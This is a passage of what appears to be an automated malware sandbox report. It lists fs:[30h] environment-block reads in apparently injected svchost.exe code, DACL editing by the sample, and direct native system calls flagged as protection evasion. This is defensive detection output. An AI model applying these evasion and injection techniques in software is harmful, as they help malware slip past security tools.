                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]1_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]1_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]1_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]1_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]1_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]1_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]1_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A430 mov eax, dword ptr fs:[00000030h]1_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]1_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]1_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]1_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]1_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]1_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]1_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]1_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728B50 mov eax, dword ptr fs:[00000030h]1_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]1_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]1_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]1_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]1_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]1_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]1_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]1_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]1_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]1_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA38 mov eax, dword ptr fs:[00000030h]1_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]1_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]1_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]1_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]1_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]1_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]1_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]1_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]1_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]1_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]1_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]1_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]1_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]1_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]1_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]1_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]1_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]1_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]1_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007D81F7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007AA364 SetUnhandledExceptionFilter,0_2_007AA364
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007AA395

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtCreateFile: Direct from: 0x77752FECJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtOpenFile: Direct from: 0x77752DCCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtSetInformationThread: Direct from: 0x777463F9Jump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtQueryInformationToken: Direct from: 0x77752CACJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtTerminateThread: Direct from: 0x77752FCCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtProtectVirtualMemory: Direct from: 0x77752F9CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtSetInformationProcess: Direct from: 0x77752C5CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtNotifyChangeKey: Direct from: 0x77753C2CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtOpenKeyEx: Direct from: 0x77752B9CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtOpenSection: Direct from: 0x77752E0CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtProtectVirtualMemory: Direct from: 0x77747B2EJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtQuerySystemInformation: Direct from: 0x777548CCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtAllocateVirtualMemory: Direct from: 0x77752BECJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtDeviceIoControlFile: Direct from: 0x77752AECJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtQueryInformationProcess: Direct from: 0x77752C26Jump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtResumeThread: Direct from: 0x77752FBCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtReadVirtualMemory: Direct from: 0x77752E8CJump to behavior
